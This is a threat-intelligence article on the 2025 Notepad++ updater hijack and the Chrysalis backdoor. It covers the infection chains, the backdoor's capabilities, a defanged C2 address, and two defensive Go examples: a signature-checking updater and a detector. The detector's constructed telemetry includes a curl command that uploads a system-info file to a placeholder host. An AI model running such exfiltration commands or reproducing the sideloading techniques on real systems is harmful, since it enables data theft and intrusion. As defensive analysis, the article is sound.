Inside the Notepad++ Supply Chain Breach: How the Chrysalis Backdoor Slipped Through the Updater
Between June and December 2025, attackers quietly compromised the update infrastructure of the widely used open-source text editor Notepad++. What began as a hosting-level breach evolved into a multi-stage supply chain attack that delivered tailored payloads to selected organizations across government, finance, and IT sectors in Asia-Pacific and Latin America.
The attackers did not tamper with the Notepad++ source code. Instead, they hijacked the update delivery path. For months, users who attempted to update the software were redirected to malicious servers hosting a weaponized update.exe.
How the Infrastructure Was Compromised
The breach originated in June 2025 when threat actors gained access to infrastructure at the hosting provider level. This access allowed them to intercept and redirect traffic intended for notepad-plus-plus.org.
Although direct access to the compromised server was lost in early September after scheduled maintenance and patching, the attackers retained valid internal service credentials. That foothold allowed them to continue redirecting download requests from getDownloadUrl.php to attacker-controlled servers until December 2, 2025.
The definitive remediation came only after the hosting provider rotated all credentials and hardened internal services. Shortly thereafter, Notepad++ released version 8.8.9, introducing signature and certificate validation in its WinGUp updater.
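As an added illustration of what a hardened updater has to check (this is not WinGUp's code and not Notepad++'s real release format), the Go example below models the two gates: the download URL handed back by the update service must point at an allow-listed host, and the installer bytes must carry a signature that verifies against a key pinned in the client, which a redirect to another server cannot forge. The page describes signature and certificate validation; Ed25519 detached signatures, the host names, the placeholder path and the installer bytes here are assumptions made for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"errors"
	"fmt"
	"net/url"
)

var ErrBadHost = errors.New("download URL host is not on the allow-list")
var ErrBadSig = errors.New("installer signature does not verify against the pinned publisher key")

// Updater holds the two trust anchors that must be compiled into the client and never fetched at
// update time: the publisher's public key and the only origins a download URL may point at.
type Updater struct {
	PublisherKey ed25519.PublicKey
	AllowedHosts map[string]bool
}

// Install runs the two gates; only a nil result means the installer may be executed. Gate 1: the URL
// handed back by the update service (getDownloadUrl.php in Notepad++'s case) must be HTTPS on an
// allow-listed host. Gate 2: the downloaded bytes must carry a detached signature made with the pinned
// key. (Ed25519 is an assumed stand-in for the signature and certificate check the real updater does.)
func (u Updater) Install(downloadURL string, installer, sig []byte) error {
	p, err := url.Parse(downloadURL)
	if err != nil || p.Scheme != "https" || !u.AllowedHosts[p.Hostname()] {
		return ErrBadHost
	}
	if len(u.PublisherKey) != ed25519.PublicKeySize || !ed25519.Verify(u.PublisherKey, installer, sig) {
		return ErrBadSig
	}
	return nil
}

// Simulate plays the publisher and three update-time outcomes: the genuine path, a hosting-level
// redirect to another host, and a tampered installer served under the right host. Host names, paths
// and installer bytes are constructed placeholders, not real Notepad++ release artefacts.
func Simulate() (legit, redirected, tampered error) {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	u := Updater{PublisherKey: pub, AllowedHosts: map[string]bool{"notepad-plus-plus.org": true}}
	installer := []byte("constructed stand-in for update.exe")
	sig := ed25519.Sign(priv, installer)
	legit = u.Install("https://notepad-plus-plus.org/placeholder/update.exe", installer, sig)
	redirected = u.Install("https://attacker-controlled.invalid/update.exe", installer, sig)
	tampered = u.Install("https://notepad-plus-plus.org/placeholder/update.exe", append(installer, 0), sig)
	return legit, redirected, tampered
}

func main() { fmt.Println(Simulate()) }
```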
Three Infection Chains, One Objective
Forensic analysis revealed three distinct execution chains deployed through the malicious installer. Each chain began with reconnaissance and data exfiltration, then escalated to advanced payload deployment.
Infection Chain 1: ProShow Exploit and Cobalt Strike
The malicious NSIS installer first gathered system data using commands such as whoami and tasklist. The collected data was uploaded to a temporary hosting service using curl, with the file path embedded in a custom User-Agent string to notify the operator.
The installer then dropped files into %APPDATA%\ProShow, including a legitimate ProShow.exe and a malicious file named load. By exploiting a vulnerability in ProShow, attackers executed embedded shellcode that decrypted a Metasploit downloader, which subsequently deployed a Cobalt Strike Beacon for remote control.
Infection Chain 2: Lua Script Abuse via Alien FFI
The second chain mirrored the reconnaissance phase but pivoted to Lua-based execution. Files were dropped into %APPDATA%\Adobe\Scripts, including a compiled Lua script disguised as alien.ini.
The script leveraged the Alien FFI library to call native Windows APIs such as VirtualAlloc and EnumWindowStationsW, allocating executable memory and injecting shellcode directly into process space. The end result was again the deployment of Cobalt Strike infrastructure.
Infection Chain 3: The Chrysalis Backdoor
The most sophisticated chain involved sideloading a malicious DLL through a legitimate executable named BluetoothService.exe, placed in %APPDATA%\Bluetooth\.
The malicious log.dll exported functions called by the legitimate process. One function decrypted an embedded shellcode blob, while another executed it. This decrypted payload became known as the Chrysalis backdoor.
Chrysalis decrypted its main module using an XOR key and parsed configuration data encrypted with RC4. Its command-and-control endpoint masqueraded as a cloud API path:
https://api.skycloudcenter[.]com/a/chat/s/70521ddf-a2ef-4adf9cf0-6d8e24aaa821.
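As an added example (not code from the article or from any vendor it names), the Go program below is defender-side detection logic run over constructed telemetry for two of the behaviours described in the chains above: a DLL side-loaded from a user-writable %APPDATA% directory by an executable sitting in the same directory (chain 3), and an installer that runs whoami/tasklist and then curl with a custom User-Agent (chain 1). The Event schema, the sample paths and the command lines are assumptions built for this example.

```go
package main

import "fmt"
import "strings"

// Event is a constructed, simplified telemetry record (hypothetical schema, not a real EDR format).
type Event struct {
	Kind   string // "proc" (process creation) or "load" (image load)
	Parent string // parent process image (proc) or the loading process image (load)
	Image  string // created process image (proc) or loaded DLL path (load)
	Cmd    string // command line (proc only)
}

// winSplit returns the lower-cased directory (with trailing backslash) and file name of a Windows path.
func winSplit(p string) (dir, base string) {
	p = strings.ToLower(p)
	i := strings.LastIndex(p, `\`)
	return p[:i+1], p[i+1:]
}

// Detect returns one alert per behaviour the article describes: a DLL side-loaded from %APPDATA% by an
// executable in the same directory, and a process that ran whoami/tasklist and then curl with a custom User-Agent.
func Detect(events []Event) []string {
	var alerts []string
	recon := map[string]bool{} // lower-cased parent image -> has already run whoami/tasklist
	for _, e := range events {
		dir, base := winSplit(e.Image)
		switch {
		case e.Kind == "load":
			if pdir, _ := winSplit(e.Parent); strings.Contains(dir, `\appdata\roaming\`) && dir == pdir {
				alerts = append(alerts, "sideload: "+e.Parent+" loaded "+e.Image)
			}
		case base == "whoami.exe" || base == "tasklist.exe":
			recon[strings.ToLower(e.Parent)] = true
		case base == "curl.exe" && recon[strings.ToLower(e.Parent)]:
			if strings.Contains(e.Cmd, " -A ") || strings.Contains(e.Cmd, "--user-agent") {
				alerts = append(alerts, "recon+exfil: "+e.Parent+" ran curl with a custom User-Agent")
			}
		}
	}
	return alerts
}

var sample = []Event{ // constructed telemetry modelled on the article's chains 1 and 3
	{"proc", `C:\Temp\update.exe`, `C:\Windows\System32\whoami.exe`, "whoami"},
	{"proc", `C:\Temp\update.exe`, `C:\Windows\System32\curl.exe`, `curl -A "C:\Temp\sysinfo.txt" -F f=@C:\Temp\sysinfo.txt https://example.invalid/`},
	{"load", `C:\Users\u\AppData\Roaming\Bluetooth\BluetoothService.exe`, `C:\Users\u\AppData\Roaming\Bluetooth\log.dll`, ""},
}

func main() { fmt.Println(strings.Join(Detect(sample), "\n")) }
```

The same directory test also covers the ProShow and Adobe\Scripts drop locations from chains 1 and 2, since they sit under the same Roaming profile path.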
Chrysalis Capabilities
Once active, Chrysalis established persistence through registry modifications or service creation. It collected system information, including the OS version, installed antivirus products, and user and machine identifiers, and encrypted the data before transmission.
Command tags received from the C2 server enabled a wide range of functionality:
- Interactive reverse shells via cmd.exe
- Remote process execution
- File read, write, and upload operations
- Self-destruct capability removing payloads and persistence keys
The modular architecture suggests a long-term espionage-oriented objective rather than opportunistic mass infection.
Why This Attack Matters
This incident demonstrates how supply chain attacks do not require source code tampering. Compromising update infrastructure is sufficient to inject malicious installers into trusted software distribution flows.
The use of legitimate executables for sideloading, Lua-based memory injection, and layered encryption techniques shows a level of operational maturity typically associated with advanced persistent threat groups.
Testing Defenses Against Supply Chain Attacks
Security validation platforms such as Picus Security offer simulation modules replicating these infection chains. Organizations can emulate Chrysalis loader threats, email-based infiltration attempts, and full supply chain scenarios to measure detection and response capabilities.
Given the complexity of the execution paths, signature-based detection alone is unlikely to suffice. Behavioral monitoring, strict updater signature verification, endpoint telemetry correlation, and outbound network inspection remain essential defensive layers.
Key Lessons
The Notepad++ supply chain compromise underscores a recurring theme in modern cyber operations: trust is the ultimate attack surface. When update mechanisms are subverted, even reputable software can become a delivery vector for advanced implants.
By the time version 8.8.9 introduced hardened updater verification in December 2025, the attackers had already maintained persistence in infrastructure for nearly half a year.
For defenders, the takeaway is clear. Monitoring update mechanisms, validating digital signatures rigorously, and simulating real-world supply chain attack chains are no longer optional controls. They are baseline requirements.